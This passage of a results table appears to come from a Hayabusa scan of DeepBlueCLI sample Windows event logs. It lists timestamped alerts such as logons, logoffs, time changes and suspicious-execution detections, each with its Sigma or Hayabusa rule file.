| 329 | 2014-11-26 06:55:06.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 330 | 2014-11-26 06:55:06.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 331 | 2014-11-26 06:57:07.814 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 332 | 2014-11-26 07:23:56.107 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 333 | 2014-11-26 07:23:56.107 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 334 | 2014-11-26 07:23:56.575 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 335 | 2014-11-26 07:26:20.278 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 336 | 2014-11-26 07:35:01.091 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0xcf598 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 337 | 2014-11-26 07:38:14.156 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 338 | 2014-11-26 07:38:14.156 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 339 | 2014-11-26 07:38:20.765 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 340 | 2014-11-26 07:38:22.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 341 | 2014-11-26 07:38:26.183 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 342 | 2014-11-26 07:38:26.183 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 343 | 2014-11-26 07:38:26.183 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 344 | 2014-11-26 07:38:48.104 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x27008 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 345 | 2014-11-26 07:38:48.104 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x27038 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 346 | 2014-11-26 07:38:48.104 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 347 | 2014-11-26 07:38:48.104 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x27008 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 348 | 2014-11-26 07:40:33.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 349 | 2014-11-26 07:40:33.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 350 | 2014-11-26 07:48:51.643 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x27038 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 351 | 2014-11-26 07:50:56.046 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 352 | 2014-11-26 07:50:56.046 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 353 | 2014-11-26 07:51:16.890 +09:00 | IE9Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 354 | 2014-11-26 07:51:22.000 +09:00 | IE9WIN7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 355 | 2014-11-26 07:51:29.601 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 356 | 2014-11-26 07:51:29.601 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 357 | 2014-11-26 07:51:29.601 +09:00 | IE9Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 358 | 2014-11-26 07:51:34.460 +09:00 | IE9Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : LogonID: 0x12048 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 359 | 2014-11-26 07:51:34.460 +09:00 | IE9Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : LogonID: 0x12070 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 360 | 2014-11-26 07:51:34.460 +09:00 | IE9Win7 | 4648 | informational | Explicit Logon | Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 361 | 2014-11-26 07:51:34.460 +09:00 | IE9Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x12048 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 362 | 2014-11-26 07:56:09.000 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 363 | 2014-11-26 07:56:09.000 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 364 | 2014-11-26 08:03:14.476 +09:00 | IE9Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x12070 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 365 | 2014-11-27 02:34:44.156 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 366 | 2014-11-27 02:34:44.156 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 367 | 2014-11-27 02:34:54.687 +09:00 | IE9Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 368 | 2014-11-27 02:34:59.000 +09:00 | IE9WIN7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 369 | 2014-11-27 02:35:04.667 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 370 | 2014-11-27 02:35:04.667 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 371 | 2014-11-27 02:35:04.667 +09:00 | IE9Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 372 | 2014-11-27 02:35:09.745 +09:00 | IE9Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 373 | 2014-11-27 02:35:09.745 +09:00 | IE9Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : LogonID: 0x13216 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 374 | 2014-11-27 02:35:09.745 +09:00 | IE9Win7 | 4648 | informational | Explicit Logon | Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 375 | 2014-11-27 02:35:09.745 +09:00 | IE9Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x131c3 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 376 | 2014-11-27 02:35:57.635 +09:00 | IE9Win7 | 4648 | informational | Explicit Logon | Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 377 | 2014-11-27 02:38:06.000 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 378 | 2014-11-27 02:38:06.000 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 379 | 2014-11-27 02:41:21.932 +09:00 | IE9Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x13216 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 380 | 2014-11-27 02:43:17.671 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 381 | 2014-11-27 02:43:17.671 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 382 | 2014-11-27 02:43:31.734 +09:00 | IE9Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 383 | 2014-11-27 02:43:40.000 +09:00 | IE9Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 384 | 2014-11-27 02:43:56.893 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 385 | 2014-11-27 02:43:56.893 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 386 | 2014-11-27 02:43:56.893 +09:00 | IE9Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 387 | 2014-11-27 02:44:39.689 +09:00 | IE9Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : LogonID: 0x36aed : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 388 | 2014-11-27 02:44:39.689 +09:00 | IE9Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 389 | 2014-11-27 02:44:39.689 +09:00 | IE9Win7 | 4648 | informational | Explicit Logon | Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 390 | 2014-11-27 02:44:39.689 +09:00 | IE9Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x36aed | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 391 | 2014-11-27 02:46:03.000 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 392 | 2014-11-27 02:46:03.000 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 393 | 2014-11-27 02:59:00.431 +09:00 | IE9Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 394 | 2014-11-27 02:59:00.431 +09:00 | IE9Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 395 | 2014-11-27 02:59:00.431 +09:00 | IE9Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 396 | 2014-11-27 03:15:07.962 +09:00 | IE9Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x36b1d | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 397 | 2014-11-27 03:16:49.390 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 398 | 2014-11-27 03:16:49.390 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 399 | 2014-11-27 03:17:04.250 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 400 | 2014-11-27 03:17:08.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 401 | 2014-11-27 03:17:13.369 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 402 | 2014-11-27 03:17:13.369 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 403 | 2014-11-27 03:17:13.369 +09:00 | IE10Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 404 | 2014-11-27 03:17:19.150 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 405 | 2014-11-27 03:17:19.150 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 406 | 2014-11-27 03:17:19.150 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 407 | 2014-11-27 03:17:19.150 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x11c02 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 408 | 2014-11-27 03:20:34.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 409 | 2014-11-27 03:20:34.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 410 | 2014-11-27 03:30:25.009 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x11c32 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 411 | 2014-11-27 08:21:46.785 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 412 | 2014-11-27 08:21:48.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 413 | 2014-11-27 08:21:50.498 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 414 | 2014-11-27 08:21:50.498 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x17125 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 415 | 2014-11-27 08:21:50.498 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 416 | 2014-11-27 08:21:50.498 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x170f5 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 417 | 2014-11-27 08:23:59.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 418 | 2014-11-27 08:23:59.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 419 | 2014-11-27 08:24:45.552 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 420 | 2014-11-27 08:24:45.552 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 421 | 2014-11-27 08:25:04.605 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x17125 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 422 | 2014-11-27 08:25:51.420 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 423 | 2014-11-27 08:25:54.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 424 | 2014-11-27 08:25:55.414 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 425 | 2014-11-27 08:25:55.414 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 426 | 2014-11-27 08:25:55.414 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 427 | 2014-11-27 08:25:55.414 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x1ac86 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 428 | 2014-11-27 08:26:40.560 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x1b245 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 429 | 2014-11-29 00:46:09.645 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 430 | 2014-11-29 00:46:10.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 431 | 2014-11-29 00:46:12.437 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 432 | 2014-11-29 00:46:12.437 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 433 | 2014-11-29 00:46:12.437 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
